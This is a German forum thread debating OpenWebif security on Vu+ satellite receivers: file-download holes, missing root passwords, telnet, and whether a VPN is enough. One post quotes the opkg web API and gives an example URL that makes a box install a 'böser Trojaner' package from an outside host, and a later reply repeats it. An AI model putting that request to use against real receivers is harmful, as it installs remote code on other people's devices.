openwebif erlaubt download beliebiger Dateien

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Dort wo die vuplus steht, habe ich keine Fritzbox, nur eine Unitymedia Connect box...
      Danke.

      @Clemens Lass uns einfach sagen, dass wir unterschiedlicher Meinung sind.

      Meiner Meinung nach ist kein System uninteressant für Angreifer, weil der Angreifer so z.B.
      - seinen Zugriff auf das lokale Netz sichern kann, wenn die ursprüngliche Sicherheitslücke bei einem Nutzer der VuPlus gestopft wurde.
      - ein Botnet immer viele unsichere Systeme benötigt. Die vielen gehackten WLAN-Kameras und Kinderspielzeuge sind oft auch erstmal nur aus dem LAN erreichbar. Die Angreifer hangeln sich von einem System im LAN zu anderen unsicheren.

      Die VTi Images haben kein root passwort und die hier schon mehrmals angesprochenen "meisten Nutzer" setzen nie eins.
      Wenn man eines in openwebif setzt und auth einschaltet, dann überlebt diese Einstellung ein reboot nicht.

      Das es viele andere Löcher bzw. attraktivere Ziele heißt doch nicht, dass jeder openwebif Nutzer alles auf der Box tun können sollte.

      Ja, ftp und telnet gehören abgeschafft. Das hindert keinen Bastler per scp und ssh ein seine Dateien zu kommen.
      Fast alle embedded Linux Systeme haben diese Sicherheitsevolution hinter
      sich. Viele verlangen heute das Setzen eines Admin-Passwortes bei der
      ersten Nutzung oder das Ändern des voreingestellten Passwortes.

    • Um es mal klar zu sagen: VPN ist nicht der Heilsbringer. Die API des OpenWebIf erlaubt die Installation von IPKs aus beliebigen Quellen.

      OE Alliance Wiki schrieb:


      Über das Webinterface
      Eine weitere Möglichkeit ist über das Webinterface (hier als Beispiel mit der dm8000):
      dm8000/command=install&package…git20111026-r0_dm8000.ipk

      OPKG Befehle im "Open Webif"
      update, ?command=updateupgrade, ?command=upgradelist_installed, ?command=list_installedlist_upgradable, ?command=list_upgradablelist, ?command=listsearch, ?command=search&file=<filename>info, ?command=info&package=<packagename>status, ?command=status&package=<packagename>install, ?command=install&package=<packagename>remove, ?command=remove&package=<packagename>

      Wenn also sowas in der Art in eine Website eingebettet ist, nutzt auch ein VPN nichts:

      Quellcode

      1. http://vusolose/command=install&package=http://irgendeine-url.de/boeser_trojaner.ipk
      Damit kann man ganz bequem den "bösen Trojaner" auf jede VU Solo SE verteilen, die irgendwie im Netz des Anfragenden erreichbar ist.


      Was gegen sowas hilft, ist den Hostname der STB ändern und die Authentifizierung im Webinterface zu aktiveren.

    • Allmächt, sagt der Franke ;)

      Wir schreiben bzw. reden hier schon noch von einen Receiver mit dem man bewegte Bilder auf einen TV bekommt, mit den VU Boxen sogar auf andere Display`s, oder?

      Ich sage dazu nur: Mein Haus, meine Geräte, meine Verantwortung, meine Sicherheitsmaßnahmen!

      @ignisvulpis

      Es gibt nichts, aber auch rein gar nichts von dem was Du verlangst, was Du nicht persönlich auch mit persönlichen Lösungen umsetzen kannst. Zu verlangen, dass eine "TV Box" Fort Nox mäßig konfiguriert werden kann, ist fei ganz schön viel verlangt. Sicherlich findest Du einen Entwickler, der gegen Bezahlung, auch eine VU Box dementsprechend einrichtet. Aber das ist dann deine ganz persönliche show und hat mit Standard Boxen nichts mehr zu tun.

      Ich habe jetzt echt alles durchgelesen und meine Emotionen schwankten von Entsetzen zu Gelächter ;) Im Ernst, was in meinem Netzwerk geschieht, bestimme ich und wenn ich etwas paranoid bin, muss ich mir halt etwas einfallen lassen. Wenn ich ein persönliches Sicherheitskonzept zu Hause habe, muss ich halt bei Neuanschaffungen neue Geräte in diese einfügen und daran hindert Dich niemand, aber es wird Dir auch keiner die Arbeit ohne Bezahlung abnehmen........Möglichkeiten hast Du genug, ein paar einfach umzusetzende Anregungen wurden dir schon gegeben, the rest is up to you. Du kannst Dir ja gerne eine Tier 4 Umgebung zu Hause aufbauen, dann bist sicher :)
      "Wozu Socken, sie schaffen nur Löcher"
      A. Einstein

      Kein Support via E-Mail! No email support!

    • ignisvulpis schrieb:

      @Clemens

      - ein Botnet immer viele unsichere Systeme benötigt. Die vielen gehackten WLAN-Kameras und Kinderspielzeuge sind oft auch erstmal nur aus dem LAN erreichbar. Die Angreifer hangeln sich von einem System im LAN zu anderen unsicheren.
      Dan muss man doch das eine System einfach nur absichern...

      Die meisten gehackten WLAN Kameras (ich bin mal frech und
      sage 99%, auch wenn ich keinen bloßen Schimmer habe) sind per
      portweiterleitung ins Netz gestellt und mit shodan.io gefunden, oder
      stellt über http selber den Stream ins Netz. Über andere Geräte gilt
      wieder das gleiche: dan ist es eh zu spät. WLAN Kameras sollte man aber
      sicher schutzen mit Kennwort, das ist in der tat indirekt interessant
      für ein Angreifer wenn z.B. das Laptop gehacked wurde, die Vu+ ist das aber kaum, und wenn man nur im NAT unterwegs ist gehts auch ohne Kennwort bei der Vu+.

      ignisvulpis schrieb:

      - ein Botnet immer viele unsichere Systeme benötigt. Die vielen gehackten WLAN-Kameras und Kinderspielzeuge sind oft auch erstmal nur aus dem LAN erreichbar. Die Angreifer hangeln sich von einem System im LAN zu anderen unsicheren.

      Die VTi Images haben kein root passwort und die hier schon mehrmals angesprochenen "meisten Nutzer" setzen nie eins.
      Wenn man eines in openwebif setzt und auth einschaltet, dann überlebt diese Einstellung ein reboot nicht.
      Wenn ein anderes Gerät zugriff hat auf der Vu+ und nen trojaner hat...dan sollt man das reparieren und nicht die Vu+. Und das eventuelle Botnetz geht schnell wieder weg wenn man entdeckt das das Laptop infiziert war und man angst hat die Vu+ wurde da durch angegriffen: man flasht die Vu+ neu. Und kannst ja einfach CPU Prozesse und Netzwerkverkehr überprüfen...

      Das mit dem reboot ist Schmarn...hier steht das Kennwort schon seit Wochen mit meheren Reboots.

      Und die meisten nutzer merken dan auch nicht das ein anderes Gerät gehacked wurde, die Vu+ ist aber nicht interessanter als der Laptop, kann als zuzäszlichen bot eingesetzt werden (glaub nicht das jemand sich damit beschäftigt), aber sonnst ist es genau so schlimm dran wie das Laptop, und wenn man nen Trojaner drauf kriegt hat man am Laptop ja dort auch Root Zugang (sonnst wäre der Trojaner ja nicht drauf gelangt) und kann alles machen.

      basti756 schrieb:

      Um es mal klar zu sagen: VPN ist nicht der Heilsbringer. Die API des OpenWebIf erlaubt die Installation von IPKs aus beliebigen Quellen.

      Quellcode

      1. http://vusolose/command=install&package=http://irgendeine-url.de/boeser_trojaner.ipk
      Damit kann man ganz bequem den "bösen Trojaner" auf jede VU Solo SE verteilen, die irgendwie im Netz des Anfragenden erreichbar ist.
      ? Und wie langt der Befehl dort??? Genau durch VPN durch...ach nee das geht ja nur wenn man das VPN Kennwort weiß. Es geht hier nicht um Tunnelbear oder hide me oder so, es geht um einen eigenen VPN Server.
      Die Vu+ führt den Befehl doch nur aus wenn man ihm sagt er solls ausführen? Und das geht nur wenn man Zugriff hat, was dank VPN nicht geht. Übrigens neben VPN Kennwort brauch man auch das nötige Zeritifkat wenn das VPN gut eingerichtet wurde, das bekommt man als Hacker auch nicht einfach her...

      Ich bin jetzt übrigens raus aus dem Thema...ich verstehe ignisvulpis seine Gedanken und ist ja gut das er besorgt ist, aber wie gesagt es ist zu viel Konjunktiv drin und ich finde nicht das sich was ändern müsste...
      Docendo Discimus
      KEIN SUPPORT PER PN!

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Clemens ()

    • Ich kann bei mir in der Config für Openwebif einstellen, dass man keine ipk dateien hochladen kann, somit wäre das /böser-virs.ipk schon mal nicht möglich.
      Und dann hab ich auch noch Einstellungen für Streaming Ja/Nein.

      Weiteres konnte ich noch nicht testen, da ich mich gerade irgendwie ausgeschlossen habe.
      Root hat kein Passwort mehr, telnet nur mit root möglich, KEIN Zugriff mehr auf OpenWebif, da hier leere Kennwörter nicht zugelassen werden und ich auch nicht weiss, wie ich einen normalen User anlegen würde.
      Das nenn ich schon sehr sicher.
      Alle sagten, das geht nicht. Dann kam einer, der wusste das nicht, und hat es einfach gemacht.

    • Bei openwebif kann man nichts sicher machen, das sehe ich auch so. Zuerst habe ich gedacht, das Lesen von Systemdateien ließe sich reparieren, aber das Installieren von beliebigen Paketen macht alle Anstrengung nutzlos. Bezüglich openwebif ist dieser Beitrag für mich durch.

    • Bei openwebif kann man nichts sicher machen
      das ist ja auch nicht dazu gemacht, fremden/nicht vertrauenswürdigen Menschen oder welchen, die eher nicht wissen was sie da tun an die Hand zu geben

      es ist ein Tool welches dem Besitzer möglichst umfangreich Funktionen zur Nutzung bereitstellt
      ============================================================================================

    • lieber @ignisvulpis:

      leider scheinst du den Sinn einer Community nicht so ganz zu verstehen und Dich leider aufs Flamen und Fingerpointing zu beschränken... wenn ich mir nur kurz dein GIT anschaue, solltest du doch ganz locker in der Lage sein, die Punkte, die Dich stören, selbst zu fixen. Das ist das schöne an einem offenen Linuxsystem - du hast alles selbst in der Hand.
      Ich muss Dir leider auch deinen Traum zerstören: Deinen gestrigen Twitter Eintrag wird so niemand von VUPlus lesen. Da gehören schon @ und # dazu - ach und natürlich ein Twitteraccount auf VU Seite...
      So ist es wieder nur sinnloses Flaming.

      Openwebif: es steht Dir doch frei Pull Requests zu erstellen, um die in Deinen Augen vorhandenen Sicherheitslücken zu patchen - falls die rejected werden, hast du immer noch die Möglichkeit, das OenWebif zu forken und eine eigene lokale Version zu installieren. Das einzige was Dich grad abhält bist du selbst.

      VPN und Portweiterleitung: das haben ja schon mehrere Leute versucht Dir zu erklären - Deine Router Ports öffnest du ganz alleine, also ist es auch Deine Verantwortung was danach in Deinem Netzwerk passiert! Hier wird an allen Ecken und Enden davon abgeraten. Du lässt die Haustür offen stehen und machst dann den Hersteller der Tür dafür verantwortlich, wenn Dir die Bude ausgeräumt wird? Irgendwas passt da nicht.

      Gerade wenn es um einen E2 Receiver geht ist halt sehr oft Mitarbeit und selbst Hand anlegen angesagt und vorallem wenn ich mir deine Twitter Timeline und Deinen GITHUB Account anschaue, sollte es doch für Dich kein Problem sein loszulegen. Den Dropbear hast du doch auch schon selbst hochgezogen, das VU Git hast du dir doch schon gezogen und weisst wie man baut.
      VMC
      EPG Share
      VU Alexa Skill
      Fluid Next
      Global Search

      Spenden sind immer herzlich willkommen... einfach hier klicken und das ganze an sbeatz76@googlemail.com schicken

    • Naja, stellt sich nur die Frage, wann @ignisvulpis entnervt aufgibt bei so viel Gegenwind, der ihm hier entgegen weht.
      Anstatt, dass er hier hilfreiche Tipps kommt, wird hier einfach nur alles schön geredet. Ihr solltet euch allesamt lieber freuen, dass sich hier jemand die Mühe macht und aktiv daran arbeitet (siehe dropbear). Kritische Fragen sollten honoriert werden, nicht relativiert oder ignoriert werden.

      OT: Ich (IT Ingenieur) sehe für die Zukunft immer schneller wachsende Chancen, dass uns unsere ach so tolle aber vergleichsweise unsichere Heim-IT irgendwann mal gehörig um die Ohren fliegt. Deswegen Zitiere ich mich aus einem anderen Thread: Keine Sicherheitsvorkehrungen, kein Mitleid.

    • Clemens schrieb:

      ? Und wie langt der Befehl dort??? Genau durch VPN durch...ach nee das geht ja nur wenn man das VPN Kennwort weiß. Es geht hier nicht um Tunnelbear oder hide me oder so, es geht um einen eigenen VPN Server.
      Die Vu+ führt den Befehl doch nur aus wenn man ihm sagt er solls ausführen? Und das geht nur wenn man Zugriff hat, was dank VPN nicht geht. Übrigens neben VPN Kennwort brauch man auch das nötige Zeritifkat wenn das VPN gut eingerichtet wurde, das bekommt man als Hacker auch nicht einfach her...
      Unsinn. Aber ich muss hier niemanden missionieren. Probier es aus, glaub es oder eben nicht. :thumbdown:

    • aufgibt bei so viel Gegenwind, der ihm hier entgegen weht
      wenn jemandem nicht nach dem Munde geredet wird, ist es noch lange kein Gegenwind
      es ist sehr wohl erlaubt, andere Meinungen/Ansichten zu vertreten - und meine ist nunmal dass an der falschen Stelle versucht wird Sicherheit herzustellen


      dass uns unsere ach so tolle aber vergleichsweise unsichere Heim-IT irgendwann mal gehörig um die Ohren fliegt.
      da bin ich ganz deiner Meinung, aber dass wird nicht passieren weil ein Tool/eine App das Problem darstellt - sondern eher weil (wie grad zu erleben) die gesamten Grundstrukturen (Prozessoren, Systeme) löchrig sind
      du kannst auf der obersten Ebene noch so viel absichern, wenn die Unterste Ebene bereits Tür und Tor öffnet
      ============================================================================================

    • basti756 schrieb:

      Unsinn. Aber ich muss hier niemanden missionieren. Probier es aus, glaub es oder eben nicht. :thumbdown:
      Was soll ich denn ausprobieren? Das eine Paketinstallation klappt aus irgendeiner Quelle? Das geht auf mein Rechner auch...muss ich den dan nicht mehr nutzen oder ist es da ein Risiko? Nein man muss halt aufpassen was man damit macht, und das ist beim Receiver genau so. So wie ich das verstehe verstehst du unter VPN einen Dienst der als art von Proxy genutzt wird wodurch man Anonym(er) surfen kann. Das das nicht hilft gegen schädlinge ist ja so...wir reden aber vom eigenen VPN Server, wo das VPN nicht als verschlüsselter Proxy funktioniert sondern als Verschlüsselter Tunnel von aussen nachs Heimnetz (dafür ist VPN auch gedacht, aber dienste wie hide me etc. nutzen das ganze als Tunnel zum Proxy Server). Durch einen eigenen VPN Server (der dann als einziger ein port forwarding kriegt und als schaltstelle zwischen Heimnetz und Ausenwelt steht) kann niemand (ausser mit richtigen Zertifikat/Kennwort) ins Heimnetz, und kann also niemand die Box kontrollieren und Befehle ausführen. Alternative ist eine einfach Portweiterleitung, wodurch nur das Openwebif Passwort schützen würde und die Verbindung nicht verschlüsselt ist. Das letzte wird hier aber abgeraten, weil brute force/wörterbuch attacken viel leichter sind, weil man schon Probleme bekommen kann wenn aus versehen das openwebif Kennwort abgeschaltet wurde aus versehen oder beim neuflashen, etc. VPN ist konzipiert nach Sicherheit, auch weil jeder mittelgroße Firma VPN einsetzt damit die Arbeitnehmer ins Firmennetz reinkommen.

      Normal kann also wenn VPN richtig eingerichtet wurde die Box nicht von aussen gesteuert werden, wenn man nicht selber auf Rechner oder Box schadsoftware installiert (und davor hat Ignisvuplis halt Angst und will die Box auch im Heimnetz abschotten)...aber dan reden wir im Konjunktiv und dann ist es eh zu spät (z.B. das nächste mal wenn du das root Kennwort eingibt hat nen Keylogger (der zur Schadsoftware gehört) es ertappt und dan helfen alle Sicherheitsmaßnahmen des Openwebif oder weiß Gott welcher Dienst auch nicht mehr)
      Docendo Discimus
      KEIN SUPPORT PER PN!

    • ich habe im git zu openwebif gefragt, wie man es fixen könnte und dazu einen, naiven, Vorschlag gemacht.
      file.py allows download of any file · Issue #731 · E2OpenPlugins/e2openplugin-OpenWebif · GitHub
      Es stellte sich heraus, dass das openwebif Konzept es zulässt, dass noch viel schlimmere möglich sind.
      Das ist einfach so und es ist das Konzept von openwebif. Das gefällt mir nicht, aber ich kann es nicht ändern, ohne openwebif komplett zu ersetzen.
      Wie gesagt, ist das Thema openwebif für mir durch. Wenn ich es ersetzen kann, dann tue ich das.

      Ich würde gerne ein Thema in einem Beitrag behandeln, aber da Du mir nicht konstruktives Verhalten vorwirfst, möchte ich doch hier darauf eingehen.
      @hmmmdada Fingerpointing? Ich versuche beizutragen und das was mich stört zu fixen, wenn ich kann.
      Unteranderem habe ich dropbear gefixed und die Sicherheitslöcher gestopft und die Pakete und sourcen hier geposted.
      Dann habe ich opera httpd support für nicht mit passwort gesegnete gefixed und den Patch hier gepostet.

      Wenn ich etwas fixen kann, dann tue ich es. Aber ich habe keine Zugriff auf "das richtige" git. Deshalb poste ich die Patches hier, damit jemand der den Zugang zum git hat, es sich anschauen kann und postet.
      Nenn mir bitte einen Link auf einen Post, wo beschrieben steht, wie PRs für VTi gemacht werden, dann gehen ich diesen Weg.
      Hier im Board wurde gesagt, code.vuplus.com wäre nicht das repository, das von den VTi Entwicklern, z. B. Dir verwendet wird.
      Noch mal, ich versuche konstruktiv beizutragen.

      Zum Thema SSL für code.vuplus.com: Ich habe hier im Board gepostet, dass ich ein SSL Zertifikat für code.vuplus.com für einfach zu machen und sinnvoll halte.
      Ich habe das hier angesprochen SSL Zertifikat für http://code.vuplus.com/index.html
      Ich habe an den bei whois genannten Admin "KIM IT" eine Email dazu geschrieben. Keine Reaktion.
      Ich habe auf vuplus.com einen Bugreport eingestellt. Keine Reaktion.
      Hier im Board war die Reaktion auf die SSL Geschichte eher negativ oder am Thema vorbei.
      Ich gehe davon aus, dass immer mehr Sites SSL benutzen. IETF und w3c unterstüzen das und LetsEncrypt macht es einfach.

      Meinen Tweet ist Fingerpointing an vuplus und public shaming. Das kann vuplus, die Firma, vertragen und hat es verdient, meine ich.
      Hier im Board greife ich niemanden persönlich an, versuche zu fixen und beizutragen.
      Hier gibt es kein Fingerpointing von mir. Nicht an Personen und nicht an VTi.

    • shadowrider schrieb:

      es ist sehr wohl erlaubt, andere Meinungen/Ansichten zu vertreten - und meine ist nunmal dass an der falschen Stelle versucht wird Sicherheit herzustellen
      Wo ist denn deiner Meinung nach die richtige Stelle um anzufangen? Selbst die unbedeutendsten Linux Distributionen haben es seit 15-20 Jahren Jahren verstanden, wie ein System bei Default-Installation zumindest einem Grundschutz genügt. Nur E2/OE ist da noch Lichtjahre von entfernt und schleppt stattdessen z.B. per Default Protokolle aus den 70'er und 80'er Jahren mit. In Kombination mit Rechte-Management (=keines) und Web-Schnittstellen, die zum Himmel schreien, ergibt das ein wunderbares Pulverfass. Ach, Passwort muss ja auch keins zwingend gesetzt werden...
      Aber alles kein Thema, denn hier im Forum wird das als unproblematisch abgetan. Also wirklich, solche Ansichten sind mir persönlich viel zu naiv.

      shadowrider schrieb:

      sondern eher weil (wie grad zu erleben) die gesamten Grundstrukturen (Prozessoren, Systeme) löchrig sind
      Meltdown/Spectre ist eine ganz andere Baustelle. Die Grundstruktur in OpenEnigma ist schon offen wie ein Scheunentor! Dazu braucht es nun wirklich keine CPU-Schwachstelle, die es mal in die TV Nachrichten schafft. Davon abgesehen tauchen fast täglich irgendwelche üblen Einfallstore in Router/Switchen/NAS/IoT/verseuchte AppStores/... auf, bei denen sich der 0815-Anwender deutlich mehr Sorgen machen sollte.

    • naiv ist eher derjenige, der die Box für fremde/ungeeignete zur Verfügung stellt, das ist nunmal weder Spielzeug noch vorgesehen, um 'Kumples' was gutes tun zu wollen

      ein Grund, warum ich eine in meinem Heimnetz oder per VPN 'angefasste' Box derartig absichern soll, ist mir nicht nachvollziehbar


      Wo ist denn deiner Meinung nach die richtige Stelle um anzufangen?
      in Bezug auf die Box: den Netz-Zugriff auf die Box nur autorisierten Personen gestatten (und diese sind so auszuwählen, das es nur welche sind die keinen Schaden anrichten)
      wir hatten es weiter oben schon, ich sichere auch mein Haus außen ab, und nicht die einzelnen Zimmer
      und um es mal klar zu sagen: jeder Schutz von Menschen gemacht, kann auch durch Menschen ausgehebelt werden
      ============================================================================================

    • Wie gegen Windmühlen hier.

      VPN interessiert mich nicht. Wir schrieben das Jahr 2018, da ist es einfach Standard, dass man Dienste - egal welcher Art und egal Wo - mit Passwörtern sichert. Auf deinem Smartphone/PC/Tablet usw. tust du es doch auch, oder?!

      Ich fange mal gang einfach an: Was spricht denn dagegen:
      1) bei VTI Standardinstallation zwingend das Setzten eines root Passwort zu fordern?
      2) Telnet ersatzlos zu entfernen?
      3) ipkg hochladen per Default im WebIF zu deaktivieren?
      4) diese schwachsinnige Root-Freigabe in Samba zu entfernen?

      4 Punkte, für deren Umsetzung wahrscheinlich nur wenige Minuten benötigen wird.

      Ok, ich habe noch zahlreiche weitere Ideen, die sind dann aber nicht mehr ganz so trivial, denn sie betreffen OE direkt und nicht VTI.

    • 1) Ob ich ein Passwort setzen will, oder nicht, möchte ich immer noch selbst entscheiden.
      (Es geht um eine "TV-Box" nicht um meinen Zugang auf mein Bankkonto)

      2) Alternative für telnet?

      3) Auch da möchte ich selbst entscheiden, ob ich was hochlade oder nicht. Genausogut könntest du ja den Feed dichtmachen.

      4) Da sehe ich im Heimnetzwerk eigentlich kein Problem und auch da will ich selbst entscheiden.

      Wenn einer seine Box sichern will, ist es natürlich seine Sache.
      ab anno MMXII amatissimus tyrannus cucinae

    • @slandy Die Alternative für telnet heißt ssh.
      Windows-Nutzer nehmen z.B. Putty als Client.
      Download PuTTY: latest release (0.70)

      Mit Putty kannst Du Dich zum SSH der Box verbinden. Zur Zeit eine unsichere Version von Dropbear.
      In diesem Beitrag habe ich das aktuelle Dropbear zusammengebaut für arm und mips und mit patch.
      Nessus Scan


      Wer möchte kann dann telnet ausschalten indem er in /etc/inetd.conf die Zeile auskommentiert.